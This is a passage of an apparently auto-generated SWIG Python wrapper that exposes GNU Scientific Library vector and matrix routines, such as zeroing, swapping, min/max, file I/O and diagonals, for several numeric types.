pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
if (name == "thisown"): return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name,None)
if method: return method(self,value)
if (not static):
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self,class_type,name,value):
return _swig_setattr_nondynamic(self,class_type,name,value,0)
def _swig_getattr(self,class_type,name):
if (name == "thisown"): return self.this.own()
method = class_type.__swig_getmethods__.get(name,None)
if method: return method(self)
raise AttributeError(name)
def _swig_repr(self):
try: strthis = "proxy of " + self.this.__repr__()
except: strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object : pass
_newclass = 0
def gsl_vector_set_zero(*args, **kwargs):
return __block.gsl_vector_set_zero(*args, **kwargs)
gsl_vector_set_zero = __block.gsl_vector_set_zero
def gsl_vector_set_all(*args, **kwargs):
return __block.gsl_vector_set_all(*args, **kwargs)
gsl_vector_set_all = __block.gsl_vector_set_all
def gsl_vector_set_basis(*args, **kwargs):
return __block.gsl_vector_set_basis(*args, **kwargs)
gsl_vector_set_basis = __block.gsl_vector_set_basis
def gsl_vector_fread(*args, **kwargs):
return __block.gsl_vector_fread(*args, **kwargs)
gsl_vector_fread = __block.gsl_vector_fread
def gsl_vector_fwrite(*args, **kwargs):
return __block.gsl_vector_fwrite(*args, **kwargs)
gsl_vector_fwrite = __block.gsl_vector_fwrite
def gsl_vector_fscanf(*args, **kwargs):
return __block.gsl_vector_fscanf(*args, **kwargs)
gsl_vector_fscanf = __block.gsl_vector_fscanf
def gsl_vector_fprintf(*args, **kwargs):
return __block.gsl_vector_fprintf(*args, **kwargs)
gsl_vector_fprintf = __block.gsl_vector_fprintf
def gsl_vector_reverse(*args, **kwargs):
return __block.gsl_vector_reverse(*args, **kwargs)
gsl_vector_reverse = __block.gsl_vector_reverse
def gsl_vector_swap(*args, **kwargs):
return __block.gsl_vector_swap(*args, **kwargs)
gsl_vector_swap = __block.gsl_vector_swap
def gsl_vector_swap_elements(*args, **kwargs):
return __block.gsl_vector_swap_elements(*args, **kwargs)
gsl_vector_swap_elements = __block.gsl_vector_swap_elements
def gsl_vector_max(*args, **kwargs):
return __block.gsl_vector_max(*args, **kwargs)
gsl_vector_max = __block.gsl_vector_max
def gsl_vector_min(*args, **kwargs):
return __block.gsl_vector_min(*args, **kwargs)
gsl_vector_min = __block.gsl_vector_min
def gsl_vector_minmax(*args, **kwargs):
return __block.gsl_vector_minmax(*args, **kwargs)
gsl_vector_minmax = __block.gsl_vector_minmax
def gsl_vector_max_index(*args, **kwargs):
return __block.gsl_vector_max_index(*args, **kwargs)
gsl_vector_max_index = __block.gsl_vector_max_index
def gsl_vector_min_index(*args, **kwargs):
return __block.gsl_vector_min_index(*args, **kwargs)
gsl_vector_min_index = __block.gsl_vector_min_index
def gsl_vector_minmax_index(*args, **kwargs):
return __block.gsl_vector_minmax_index(*args, **kwargs)
gsl_vector_minmax_index = __block.gsl_vector_minmax_index
def gsl_vector_isnull(*args, **kwargs):
return __block.gsl_vector_isnull(*args, **kwargs)
gsl_vector_isnull = __block.gsl_vector_isnull
def gsl_matrix_set_zero(*args, **kwargs):
return __block.gsl_matrix_set_zero(*args, **kwargs)
gsl_matrix_set_zero = __block.gsl_matrix_set_zero
def gsl_matrix_set_all(*args, **kwargs):
return __block.gsl_matrix_set_all(*args, **kwargs)
gsl_matrix_set_all = __block.gsl_matrix_set_all
def gsl_matrix_set_identity(*args, **kwargs):
return __block.gsl_matrix_set_identity(*args, **kwargs)
gsl_matrix_set_identity = __block.gsl_matrix_set_identity
def gsl_matrix_fread(*args, **kwargs):
return __block.gsl_matrix_fread(*args, **kwargs)
gsl_matrix_fread = __block.gsl_matrix_fread
def gsl_matrix_fwrite(*args, **kwargs):
return __block.gsl_matrix_fwrite(*args, **kwargs)
gsl_matrix_fwrite = __block.gsl_matrix_fwrite
def gsl_matrix_fscanf(*args, **kwargs):
return __block.gsl_matrix_fscanf(*args, **kwargs)
gsl_matrix_fscanf = __block.gsl_matrix_fscanf
def gsl_matrix_fprintf(*args, **kwargs):
return __block.gsl_matrix_fprintf(*args, **kwargs)
gsl_matrix_fprintf = __block.gsl_matrix_fprintf
def gsl_matrix_swap(*args, **kwargs):
return __block.gsl_matrix_swap(*args, **kwargs)
gsl_matrix_swap = __block.gsl_matrix_swap
def gsl_matrix_swap_rows(*args, **kwargs):
return __block.gsl_matrix_swap_rows(*args, **kwargs)
gsl_matrix_swap_rows = __block.gsl_matrix_swap_rows
def gsl_matrix_swap_columns(*args, **kwargs):
return __block.gsl_matrix_swap_columns(*args, **kwargs)
gsl_matrix_swap_columns = __block.gsl_matrix_swap_columns
def gsl_matrix_swap_rowcol(*args, **kwargs):
return __block.gsl_matrix_swap_rowcol(*args, **kwargs)
gsl_matrix_swap_rowcol = __block.gsl_matrix_swap_rowcol
def gsl_matrix_transpose(*args, **kwargs):
return __block.gsl_matrix_transpose(*args, **kwargs)
gsl_matrix_transpose = __block.gsl_matrix_transpose
def gsl_matrix_max(*args, **kwargs):
return __block.gsl_matrix_max(*args, **kwargs)
gsl_matrix_max = __block.gsl_matrix_max
def gsl_matrix_min(*args, **kwargs):
return __block.gsl_matrix_min(*args, **kwargs)
gsl_matrix_min = __block.gsl_matrix_min
def gsl_matrix_minmax(*args, **kwargs):
return __block.gsl_matrix_minmax(*args, **kwargs)
gsl_matrix_minmax = __block.gsl_matrix_minmax
def gsl_matrix_max_index(*args, **kwargs):
return __block.gsl_matrix_max_index(*args, **kwargs)
gsl_matrix_max_index = __block.gsl_matrix_max_index
def gsl_matrix_min_index(*args, **kwargs):
return __block.gsl_matrix_min_index(*args, **kwargs)
gsl_matrix_min_index = __block.gsl_matrix_min_index
def gsl_matrix_minmax_index(*args, **kwargs):
return __block.gsl_matrix_minmax_index(*args, **kwargs)
gsl_matrix_minmax_index = __block.gsl_matrix_minmax_index
def gsl_matrix_isnull(*args, **kwargs):
return __block.gsl_matrix_isnull(*args, **kwargs)
gsl_matrix_isnull = __block.gsl_matrix_isnull
def gsl_matrix_diagonal(*args, **kwargs):
return __block.gsl_matrix_diagonal(*args, **kwargs)
gsl_matrix_diagonal = __block.gsl_matrix_diagonal
def gsl_matrix_subdiagonal(*args, **kwargs):
return __block.gsl_matrix_subdiagonal(*args, **kwargs)
gsl_matrix_subdiagonal = __block.gsl_matrix_subdiagonal
def gsl_matrix_superdiagonal(*args, **kwargs):
return __block.gsl_matrix_superdiagonal(*args, **kwargs)
gsl_matrix_superdiagonal = __block.gsl_matrix_superdiagonal
def gsl_vector_float_set_zero(*args, **kwargs):
return __block.gsl_vector_float_set_zero(*args, **kwargs)
gsl_vector_float_set_zero = __block.gsl_vector_float_set_zero
def gsl_vector_float_set_all(*args, **kwargs):
return __block.gsl_vector_float_set_all(*args, **kwargs)
gsl_vector_float_set_all = __block.gsl_vector_float_set_all
def gsl_vector_float_set_basis(*args, **kwargs):
return __block.gsl_vector_float_set_basis(*args, **kwargs)
gsl_vector_float_set_basis = __block.gsl_vector_float_set_basis
def gsl_vector_float_fread(*args, **kwargs):
return __block.gsl_vector_float_fread(*args, **kwargs)
gsl_vector_float_fread = __block.gsl_vector_float_fread
def gsl_vector_float_fwrite(*args, **kwargs):
return __block.gsl_vector_float_fwrite(*args, **kwargs)
gsl_vector_float_fwrite = __block.gsl_vector_float_fwrite
def gsl_vector_float_fscanf(*args, **kwargs):
return __block.gsl_vector_float_fscanf(*args, **kwargs)
gsl_vector_float_fscanf = __block.gsl_vector_float_fscanf
def gsl_vector_float_fprintf(*args, **kwargs):
return __block.gsl_vector_float_fprintf(*args, **kwargs)
gsl_vector_float_fprintf = __block.gsl_vector_float_fprintf
def gsl_vector_float_reverse(*args, **kwargs):
return __block.gsl_vector_float_reverse(*args, **kwargs)
gsl_vector_float_reverse = __block.gsl_vector_float_reverse
def gsl_vector_float_swap(*args, **kwargs):
return __block.gsl_vector_float_swap(*args, **kwargs)
gsl_vector_float_swap = __block.gsl_vector_float_swap
def gsl_vector_float_swap_elements(*args, **kwargs):
return __block.gsl_vector_float_swap_elements(*args, **kwargs)
gsl_vector_float_swap_elements = __block.gsl_vector_float_swap_elements
def gsl_vector_float_max(*args, **kwargs):
return __block.gsl_vector_float_max(*args, **kwargs)
gsl_vector_float_max = __block.gsl_vector_float_max
def gsl_vector_float_min(*args, **kwargs):
return __block.gsl_vector_float_min(*args, **kwargs)
gsl_vector_float_min = __block.gsl_vector_float_min
def gsl_vector_float_minmax(*args, **kwargs):
return __block.gsl_vector_float_minmax(*args, **kwargs)
gsl_vector_float_minmax = __block.gsl_vector_float_minmax
def gsl_vector_float_max_index(*args, **kwargs):
return __block.gsl_vector_float_max_index(*args, **kwargs)
gsl_vector_float_max_index = __block.gsl_vector_float_max_index
def gsl_vector_float_min_index(*args, **kwargs):
return __block.gsl_vector_float_min_index(*args, **kwargs)
gsl_vector_float_min_index = __block.gsl_vector_float_min_index
def gsl_vector_float_minmax_index(*args, **kwargs):
return __block.gsl_vector_float_minmax_index(*args, **kwargs)
gsl_vector_float_minmax_index = __block.gsl_vector_float_minmax_index
def gsl_vector_float_isnull(*args, **kwargs):
return __block.gsl_vector_float_isnull(*args, **kwargs)
gsl_vector_float_isnull = __block.gsl_vector_float_isnull
def gsl_matrix_float_set_zero(*args, **kwargs):
return __block.gsl_matrix_float_set_zero(*args, **kwargs)
gsl_matrix_float_set_zero = __block.gsl_matrix_float_set_zero
def gsl_matrix_float_set_all(*args, **kwargs):
return __block.gsl_matrix_float_set_all(*args, **kwargs)
gsl_matrix_float_set_all = __block.gsl_matrix_float_set_all
def gsl_matrix_float_set_identity(*args, **kwargs):
return __block.gsl_matrix_float_set_identity(*args, **kwargs)
gsl_matrix_float_set_identity = __block.gsl_matrix_float_set_identity
def gsl_matrix_float_fread(*args, **kwargs):
return __block.gsl_matrix_float_fread(*args, **kwargs)
gsl_matrix_float_fread = __block.gsl_matrix_float_fread
def gsl_matrix_float_fwrite(*args, **kwargs):
return __block.gsl_matrix_float_fwrite(*args, **kwargs)
gsl_matrix_float_fwrite = __block.gsl_matrix_float_fwrite
def gsl_matrix_float_fscanf(*args, **kwargs):
return __block.gsl_matrix_float_fscanf(*args, **kwargs)
gsl_matrix_float_fscanf = __block.gsl_matrix_float_fscanf
def gsl_matrix_float_fprintf(*args, **kwargs):
return __block.gsl_matrix_float_fprintf(*args, **kwargs)
gsl_matrix_float_fprintf = __block.gsl_matrix_float_fprintf
def gsl_matrix_float_swap(*args, **kwargs):
return __block.gsl_matrix_float_swap(*args, **kwargs)
gsl_matrix_float_swap = __block.gsl_matrix_float_swap
def gsl_matrix_float_swap_rows(*args, **kwargs):
return __block.gsl_matrix_float_swap_rows(*args, **kwargs)
gsl_matrix_float_swap_rows = __block.gsl_matrix_float_swap_rows
def gsl_matrix_float_swap_columns(*args, **kwargs):
return __block.gsl_matrix_float_swap_columns(*args, **kwargs)
gsl_matrix_float_swap_columns = __block.gsl_matrix_float_swap_columns
def gsl_matrix_float_swap_rowcol(*args, **kwargs):
return __block.gsl_matrix_float_swap_rowcol(*args, **kwargs)
gsl_matrix_float_swap_rowcol = __block.gsl_matrix_float_swap_rowcol
def gsl_matrix_float_transpose(*args, **kwargs):
return __block.gsl_matrix_float_transpose(*args, **kwargs)
gsl_matrix_float_transpose = __block.gsl_matrix_float_transpose
def gsl_matrix_float_max(*args, **kwargs):
return __block.gsl_matrix_float_max(*args, **kwargs)
gsl_matrix_float_max = __block.gsl_matrix_float_max
def gsl_matrix_float_min(*args, **kwargs):
return __block.gsl_matrix_float_min(*args, **kwargs)
gsl_matrix_float_min = __block.gsl_matrix_float_min
def gsl_matrix_float_minmax(*args, **kwargs):
return __block.gsl_matrix_float_minmax(*args, **kwargs)
gsl_matrix_float_minmax = __block.gsl_matrix_float_minmax
def gsl_matrix_float_max_index(*args, **kwargs):
return __block.gsl_matrix_float_max_index(*args, **kwargs)
gsl_matrix_float_max_index = __block.gsl_matrix_float_max_index
def gsl_matrix_float_min_index(*args, **kwargs):
return __block.gsl_matrix_float_min_index(*args, **kwargs)
gsl_matrix_float_min_index = __block.gsl_matrix_float_min_index
def gsl_matrix_float_minmax_index(*args, **kwargs):
return __block.gsl_matrix_float_minmax_index(*args, **kwargs)
gsl_matrix_float_minmax_index = __block.gsl_matrix_float_minmax_index
def gsl_matrix_float_isnull(*args, **kwargs):
return __block.gsl_matrix_float_isnull(*args, **kwargs)
gsl_matrix_float_isnull = __block.gsl_matrix_float_isnull
def gsl_matrix_float_diagonal(*args, **kwargs):
return __block.gsl_matrix_float_diagonal(*args, **kwargs)
gsl_matrix_float_diagonal = __block.gsl_matrix_float_diagonal
def gsl_matrix_float_subdiagonal(*args, **kwargs):
return __block.gsl_matrix_float_subdiagonal(*args, **kwargs)
gsl_matrix_float_subdiagonal = __block.gsl_matrix_float_subdiagonal
def gsl_matrix_float_superdiagonal(*args, **kwargs):
return __block.gsl_matrix_float_superdiagonal(*args, **kwargs)
gsl_matrix_float_superdiagonal = __block.gsl_matrix_float_superdiagonal
def gsl_vector_long_set_zero(*args, **kwargs):
return __block.gsl_vector_long_set_zero(*args, **kwargs)
gsl_vector_long_set_zero = __block.gsl_vector_long_set_zero
def gsl_vector_long_set_all(*args, **kwargs):
return __block.gsl_vector_long_set_all(*args, **kwargs)
gsl_vector_long_set_all = __block.gsl_vector_long_set_all
def gsl_vector_long_set_basis(*args, **kwargs):
return __block.gsl_vector_long_set_basis(*args, **kwargs)
gsl_vector_long_set_basis = __block.gsl_vector_long_set_basis
def gsl_vector_long_fread(*args, **kwargs):
return __block.gsl_vector_long_fread(*args, **kwargs)
gsl_vector_long_fread = __block.gsl_vector_long_fread
def gsl_vector_long_fwrite(*args, **kwargs):
return __block.gsl_vector_long_fwrite(*args, **kwargs)
gsl_vector_long_fwrite = __block.gsl_vector_long_fwrite
def gsl_vector_long_fscanf(*args, **kwargs):
return __block.gsl_vector_long_fscanf(*args, **kwargs)
gsl_vector_long_fscanf = __block.gsl_vector_long_fscanf
def gsl_vector_long_fprintf(*args, **kwargs):
return __block.gsl_vector_long_fprintf(*args, **kwargs)
gsl_vector_long_fprintf = __block.gsl_vector_long_fprintf
def gsl_vector_long_reverse(*args, **kwargs):
return __block.gsl_vector_long_reverse(*args, **kwargs)
gsl_vector_long_reverse = __block.gsl_vector_long_reverse
def gsl_vector_long_swap(*args, **kwargs):
return __block.gsl_vector_long_swap(*args, **kwargs)
gsl_vector_long_swap = __block.gsl_vector_long_swap
def gsl_vector_long_swap_elements(*args, **kwargs):
return __block.gsl_vector_long_swap_elements(*args, **kwargs)
gsl_vector_long_swap_elements = __block.gsl_vector_long_swap_elements
def gsl_vector_long_max(*args, **kwargs):
return __block.gsl_vector_long_max(*args, **kwargs)
gsl_vector_long_max = __block.gsl_vector_long_max
def gsl_vector_long_min(*args, **kwargs):
return __block.gsl_vector_long_min(*args, **kwargs)
gsl_vector_long_min = __block.gsl_vector_long_min
def gsl_vector_long_minmax(*args, **kwargs):
return __block.gsl_vector_long_minmax(*args, **kwargs)
gsl_vector_long_minmax = __block.gsl_vector_long_minmax
def gsl_vector_long_max_index(*args, **kwargs):
return __block.gsl_vector_long_max_index(*args, **kwargs)
gsl_vector_long_max_index = __block.gsl_vector_long_max_index
def gsl_vector_long_min_index(*args, **kwargs):
return __block.gsl_vector_long_min_index(*args, **kwargs)
gsl_vector_long_min_index = __block.gsl_vector_long_min_index
def gsl_vector_long_minmax_index(*args, **kwargs):
return __block.gsl_vector_long_minmax_index(*args, **kwargs)
gsl_vector_long_minmax_index = __block.gsl_vector_long_minmax_index
def gsl_vector_long_isnull(*args, **kwargs):
return __block.gsl_vector_long_isnull(*args, **kwargs)
gsl_vector_long_isnull = __block.gsl_vector_long_isnull
def gsl_matrix_long_set_zero(*args, **kwargs):
return __block.gsl_matrix_long_set_zero(*args, **kwargs)
gsl_matrix_long_set_zero = __block.gsl_matrix_long_set_zero
def gsl_matrix_long_set_all(*args, **kwargs):
return __block.gsl_matrix_long_set_all(*args, **kwargs)
gsl_matrix_long_set_all = __block.gsl_matrix_long_set_all
def gsl_matrix_long_set_identity(*args, **kwargs):
return __block.gsl_matrix_long_set_identity(*args, **kwargs)
gsl_matrix_long_set_identity = __block.gsl_matrix_long_set_identity
def gsl_matrix_long_fread(*args, **kwargs):
return __block.gsl_matrix_long_fread(*args, **kwargs)
gsl_matrix_long_fread = __block.gsl_matrix_long_fread
def gsl_matrix_long_fwrite(*args, **kwargs):
return __block.gsl_matrix_long_fwrite(*args, **kwargs)
gsl_matrix_long_fwrite = __block.gsl_matrix_long_fwrite
def gsl_matrix_long_fscanf(*args, **kwargs):
return __block.gsl_matrix_long_fscanf(*args, **kwargs)
gsl_matrix_long_fscanf = __block.gsl_matrix_long_fscanf
def gsl_matrix_long_fprintf(*args, **kwargs):
return __block.gsl_matrix_long_fprintf(*args, **kwargs)
gsl_matrix_long_fprintf = __block.gsl_matrix_long_fprintf
def gsl_matrix_long_swap(*args, **kwargs):
return __block.gsl_matrix_long_swap(*args, **kwargs)
gsl_matrix_long_swap = __block.gsl_matrix_long_swap
def gsl_matrix_long_swap_rows(*args, **kwargs):
return __block.gsl_matrix_long_swap_rows(*args, **kwargs)
gsl_matrix_long_swap_rows = __block.gsl_matrix_long_swap_rows
def gsl_matrix_long_swap_columns(*args, **kwargs):
return __block.gsl_matrix_long_swap_columns(*args, **kwargs)
gsl_matrix_long_swap_columns = __block.gsl_matrix_long_swap_columns
def gsl_matrix_long_swap_rowcol(*args, **kwargs):
return __block.gsl_matrix_long_swap_rowcol(*args, **kwargs)
gsl_matrix_long_swap_rowcol = __block.gsl_matrix_long_swap_rowcol
def gsl_matrix_long_transpose(*args, **kwargs):
return __block.gsl_matrix_long_transpose(*args, **kwargs)
gsl_matrix_long_transpose = __block.gsl_matrix_long_transpose
def gsl_matrix_long_max(*args, **kwargs):
return __block.gsl_matrix_long_max(*args, **kwargs)
gsl_matrix_long_max = __block.gsl_matrix_long_max
def gsl_matrix_long_min(*args, **kwargs):
return __block.gsl_matrix_long_min(*args, **kwargs)
gsl_matrix_long_min = __block.gsl_matrix_long_min
def gsl_matrix_long_minmax(*args, **kwargs):
return __block.gsl_matrix_long_minmax(*args, **kwargs)
gsl_matrix_long_minmax = __block.gsl_matrix_long_minmax
def gsl_matrix_long_max_index(*args, **kwargs):
return __block.gsl_matrix_long_max_index(*args, **kwargs)
gsl_matrix_long_max_index = __block.gsl_matrix_long_max_index
def gsl_matrix_long_min_index(*args, **kwargs):
return __block.gsl_matrix_long_min_index(*args, **kwargs)
gsl_matrix_long_min_index = __block.gsl_matrix_long_min_index
def gsl_matrix_long_minmax_index(*args, **kwargs):
return __block.gsl_matrix_long_minmax_index(*args, **kwargs)
gsl_matrix_long_minmax_index = __block.gsl_matrix_long_minmax_index
def gsl_matrix_long_isnull(*args, **kwargs):
return __block.gsl_matrix_long_isnull(*args, **kwargs)
gsl_matrix_long_isnull = __block.gsl_matrix_long_isnull
def gsl_matrix_long_diagonal(*args, **kwargs):
return __block.gsl_matrix_long_diagonal(*args, **kwargs)
gsl_matrix_long_diagonal = __block.gsl_matrix_long_diagonal
def gsl_matrix_long_subdiagonal(*args, **kwargs):
return __block.gsl_matrix_long_subdiagonal(*args, **kwargs)
gsl_matrix_long_subdiagonal = __block.gsl_matrix_long_subdiagonal
def gsl_matrix_long_superdiagonal(*args, **kwargs):
return __block.gsl_matrix_long_superdiagonal(*args, **kwargs)
gsl_matrix_long_superdiagonal = __block.gsl_matrix_long_superdiagonal
def gsl_vector_int_set_zero(*args, **kwargs):
return __block.gsl_vector_int_set_zero(*args, **kwargs)
gsl_vector_int_set_zero = __block.gsl_vector_int_set_zero
def gsl_vector_int_set_all(*args, **kwargs):
return __block.gsl_vector_int_set_all(*args, **kwargs)
gsl_vector_int_set_all = __block.gsl_vector_int_set_all
def gsl_vector_int_set_basis(*args, **kwargs):
return __block.gsl_vector_int_set_basis(*args, **kwargs)
gsl_vector_int_set_basis = __block.gsl_vector_int_set_basis
def gsl_vector_int_fread(*args, **kwargs):
return __block.gsl_vector_int_fread(*args, **kwargs)
gsl_vector_int_fread = __block.gsl_vector_int_fread
def gsl_vector_int_fwrite(*args, **kwargs):
return __block.gsl_vector_int_fwrite(*args, **kwargs)
gsl_vector_int_fwrite = __block.gsl_vector_int_fwrite
def gsl_vector_int_fscanf(*args, **kwargs):
return __block.gsl_vector_int_fscanf(*args, **kwargs)
gsl_vector_int_fscanf = __block.gsl_vector_int_fscanf
def gsl_vector_int_fprintf(*args, **kwargs):
return __block.gsl_vector_int_fprintf(*args, **kwargs)
gsl_vector_int_fprintf = __block.gsl_vector_int_fprintf
def gsl_vector_int_reverse(*args, **kwargs):
return __block.gsl_vector_int_reverse(*args, **kwargs)
gsl_vector_int_reverse = __block.gsl_vector_int_reverse
def gsl_vector_int_swap(*args, **kwargs):
return __block.gsl_vector_int_swap(*args, **kwargs)
gsl_vector_int_swap = __block.gsl_vector_int_swap
def gsl_vector_int_swap_elements(*args, **kwargs):
return __block.gsl_vector_int_swap_elements(*args, **kwargs)
gsl_vector_int_swap_elements = __block.gsl_vector_int_swap_elements
def gsl_vector_int_max(*args, **kwargs):
return __block.gsl_vector_int_max(*args, **kwargs)
gsl_vector_int_max = __block.gsl_vector_int_max
def gsl_vector_int_min(*args, **kwargs):
return __block.gsl_vector_int_min(*args, **kwargs)
gsl_vector_int_min = __block.gsl_vector_int_min
def gsl_vector_int_minmax(*args, **kwargs):
return __block.gsl_vector_int_minmax(*args, **kwargs)
gsl_vector_int_minmax = __block.gsl_vector_int_minmax
def gsl_vector_int_max_index(*args, **kwargs):
return __block.gsl_vector_int_max_index(*args, **kwargs)
gsl_vector_int_max_index = __block.gsl_vector_int_max_index
def gsl_vector_int_min_index(*args, **kwargs):
return __block.gsl_vector_int_min_index(*args, **kwargs)
gsl_vector_int_min_index = __block.gsl_vector_int_min_index
def gsl_vector_int_minmax_index(*args, **kwargs):
return __block.gsl_vector_int_minmax_index(*args, **kwargs)
gsl_vector_int_minmax_index = __block.gsl_vector_int_minmax_index
def gsl_vector_int_isnull(*args, **kwargs):
return __block.gsl_vector_int_isnull(*args, **kwargs)
gsl_vector_int_isnull = __block.gsl_vector_int_isnull
def gsl_matrix_int_set_zero(*args, **kwargs):
return __block.gsl_matrix_int_set_zero(*args, **kwargs)
gsl_matrix_int_set_zero = __block.gsl_matrix_int_set_zero
def gsl_matrix_int_set_all(*args, **kwargs):
return __block.gsl_matrix_int_set_all(*args, **kwargs)
gsl_matrix_int_set_all = __block.gsl_matrix_int_set_all
def gsl_matrix_int_set_identity(*args, **kwargs):
return __block.gsl_matrix_int_set_identity(*args, **kwargs)
gsl_matrix_int_set_identity = __block.gsl_matrix_int_set_identity
def gsl_matrix_int_fread(*args, **kwargs):
return __block.gsl_matrix_int_fread(*args, **kwargs)
gsl_matrix_int_fread = __block.gsl_matrix_int_fread
def gsl_matrix_int_fwrite(*args, **kwargs):
return __block.gsl_matrix_int_fwrite(*args, **kwargs)
gsl_matrix_int_fwrite = __block.gsl_matrix_int_fwrite
def gsl_matrix_int_fscanf(*args, **kwargs):
return __block.gsl_matrix_int_fscanf(*args, **kwargs)
gsl_matrix_int_fscanf = __block.gsl_matrix_int_fscanf
def gsl_matrix_int_fprintf(*args, **kwargs):
return __block.gsl_matrix_int_fprintf(*args, **kwargs)
gsl_matrix_int_fprintf = __block.gsl_matrix_int_fprintf
def gsl_matrix_int_swap(*args, **kwargs):
return __block.gsl_matrix_int_swap(*args, **kwargs)
gsl_matrix_int_swap = __block.gsl_matrix_int_swap
def gsl_matrix_int_swap_rows(*args, **kwargs):
return __block.gsl_matrix_int_swap_rows(*args, **kwargs)
gsl_matrix_int_swap_rows = __block.gsl_matrix_int_swap_rows
def gsl_matrix_int_swap_columns(*args, **kwargs):
return __block.gsl_matrix_int_swap_columns(*args, **kwargs)
gsl_matrix_int_swap_columns = __block.gsl_matrix_int_swap_columns
def gsl_matrix_int_swap_rowcol(*args, **kwargs):
return __block.gsl_matrix_int_swap_rowcol(*args, **kwargs)
gsl_matrix_int_swap_rowcol = __block.gsl_matrix_int_swap_rowcol
def gsl_matrix_int_transpose(*args, **kwargs):
return __block.gsl_matrix_int_transpose(*args, **kwargs)
gsl_matrix_int_transpose = __block.gsl_matrix_int_transpose
def gsl_matrix_int_max(*args, **kwargs):
return __block.gsl_matrix_int_max(*args, **kwargs)
gsl_matrix_int_max = __block.gsl_matrix_int_max
def gsl_matrix_int_min(*args, **kwargs):
return __block.gsl_matrix_int_min(*args, **kwargs)
gsl_matrix_int_min = __block.gsl_matrix_int_min
def gsl_matrix_int_minmax(*args, **kwargs):
return __block.gsl_matrix_int_minmax(*args, **kwargs)
gsl_matrix_int_minmax = __block.gsl_matrix_int_minmax
def gsl_matrix_int_max_index(*args, **kwargs):
return __block.gsl_matrix_int_max_index(*args, **kwargs)
gsl_matrix_int_max_index = __block.gsl_matrix_int_max_index
def gsl_matrix_int_min_index(*args, **kwargs):
return __block.gsl_matrix_int_min_index(*args, **kwargs)
gsl_matrix_int_min_index = __block.gsl_matrix_int_min_index
def gsl_matrix_int_minmax_index(*args, **kwargs):
return __block.gsl_matrix_int_minmax_index(*args, **kwargs)
gsl_matrix_int_minmax_index = __block.gsl_matrix_int_minmax_index
def gsl_matrix_int_isnull(*args, **kwargs):
return __block.gsl_matrix_int_isnull(*args, **kwargs)
gsl_matrix_int_isnull = __block.gsl_matrix_int_isnull
def gsl_matrix_int_diagonal(*args, **kwargs):
return __block.gsl_matrix_int_diagonal(*args, **kwargs)
gsl_matrix_int_diagonal = __block.gsl_matrix_int_diagonal
def gsl_matrix_int_subdiagonal(*args, **kwargs):
return __block.gsl_matrix_int_subdiagonal(*args, **kwargs)
gsl_matrix_int_subdiagonal = __block.gsl_matrix_int_subdiagonal
def gsl_matrix_int_superdiagonal(*args, **kwargs):
return __block.gsl_matrix_int_superdiagonal(*args, **kwargs)
gsl_matrix_int_superdiagonal = __block.gsl_matrix_int_superdiagonal
def gsl_vector_short_set_zero(*args, **kwargs):
return __block.gsl_vector_short_set_zero(*args, **kwargs)
gsl_vector_short_set_zero = __block.gsl_vector_short_set_zero
def gsl_vector_short_set_all(*args, **kwargs):
return __block.gsl_vector_short_set_all(*args, **kwargs)
gsl_vector_short_set_all = __block.gsl_vector_short_set_all
def gsl_vector_short_set_basis(*args, **kwargs):
return __block.gsl_vector_short_set_basis(*args, **kwargs)
gsl_vector_short_set_basis = __block.gsl_vector_short_set_basis
def gsl_vector_short_fread(*args, **kwargs):
return __block.gsl_vector_short_fread(*args, **kwargs)
gsl_vector_short_fread = __block.gsl_vector_short_fread
def gsl_vector_short_fwrite(*args, **kwargs):
return __block.gsl_vector_short_fwrite(*args, **kwargs)
gsl_vector_short_fwrite = __block.gsl_vector_short_fwrite
def gsl_vector_short_fscanf(*args, **kwargs):
return __block.gsl_vector_short_fscanf(*args, **kwargs)
gsl_vector_short_fscanf = __block.gsl_vector_short_fscanf
def gsl_vector_short_fprintf(*args, **kwargs):
return __block.gsl_vector_short_fprintf(*args, **kwargs)
gsl_vector_short_fprintf = __block.gsl_vector_short_fprintf
def gsl_vector_short_reverse(*args, **kwargs):
return __block.gsl_vector_short_reverse(*args, **kwargs)
gsl_vector_short_reverse = __block.gsl_vector_short_reverse
def gsl_vector_short_swap(*args, **kwargs):
return __block.gsl_vector_short_swap(*args, **kwargs)
gsl_vector_short_swap = __block.gsl_vector_short_swap
def gsl_vector_short_swap_elements(*args, **kwargs):
return __block.gsl_vector_short_swap_elements(*args, **kwargs)
gsl_vector_short_swap_elements = __block.gsl_vector_short_swap_elements
def gsl_vector_short_max(*args, **kwargs):
return __block.gsl_vector_short_max(*args, **kwargs)
gsl_vector_short_max = __block.gsl_vector_short_max
def gsl_vector_short_min(*args, **kwargs):
return __block.gsl_vector_short_min(*args, **kwargs)
gsl_vector_short_min = __block.gsl_vector_short_min
def gsl_vector_short_minmax(*args, **kwargs):
return __block.gsl_vector_short_minmax(*args, **kwargs)
gsl_vector_short_minmax = __block.gsl_vector_short_minmax
def gsl_vector_short_max_index(*args, **kwargs):
return __block.gsl_vector_short_max_index(*args, **kwargs)
gsl_vector_short_max_index = __block.gsl_vector_short_max_index
def gsl_vector_short_min_index(*args, **kwargs):
return __block.gsl_vector_short_min_index(*args, **kwargs)
gsl_vector_short_min_index = __block.gsl_vector_short_min_index
def gsl_vector_short_minmax_index(*args, **kwargs):
return __block.gsl_vector_short_minmax_index(*args, **kwargs)
gsl_vector_short_minmax_index = __block.gsl_vector_short_minmax_index
def gsl_vector_short_isnull(*args, **kwargs):
return __block.gsl_vector_short_isnull(*args, **kwargs)
gsl_vector_short_isnull = __block.gsl_vector_short_isnull
def gsl_matrix_short_set_zero(*args, **kwargs):
return __block.gsl_matrix_short_set_zero(*args, **kwargs)
gsl_matrix_short_set_zero = __block.gsl_matrix_short_set_zero
def gsl_matrix_short_set_all(*args, **kwargs):
return __block.gsl_matrix_short_set_all(*args, **kwargs)
gsl_matrix_short_set_all = __block.gsl_matrix_short_set_all
def gsl_matrix_short_set_identity(*args, **kwargs):
return __block.gsl_matrix_short_set_identity(*args, **kwargs)
gsl_matrix_short_set_identity = __block.gsl_matrix_short_set_identity
def gsl_matrix_short_fread(*args, **kwargs):
return __block.gsl_matrix_short_fread(*args, **kwargs)
gsl_matrix_short_fread = __block.gsl_matrix_short_fread
